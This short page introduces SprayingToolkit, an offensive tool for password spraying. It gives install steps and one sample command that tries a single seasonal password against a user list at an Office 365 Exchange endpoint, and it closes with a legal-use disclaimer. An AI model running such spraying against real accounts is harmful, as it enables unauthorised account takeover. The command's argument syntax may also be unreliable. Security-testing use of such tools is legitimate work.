# SprayingToolkit

### Installing the SprayingToolkit

To install SprayingToolkit, run the following command:

```bash
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
pip install -r requirements.txt
```

{% @mailchimp/mailchimpSubscribe %}

## Usage

After installation, you can start using SprayingToolkit to perform password spraying attacks against various services. Below is an example of how to use SprayingToolkit with Exchange:

```bash
python spray.py -u users.txt -p Spring2023! -U domain\\username -url https://outlook.office365.com -t 5
```

Remember to stay within legal boundaries and use the tool for legitimate security testing purposes only.

{% embed url="<https://github.com/byt3bl33d3r/SprayingToolkit>" %}
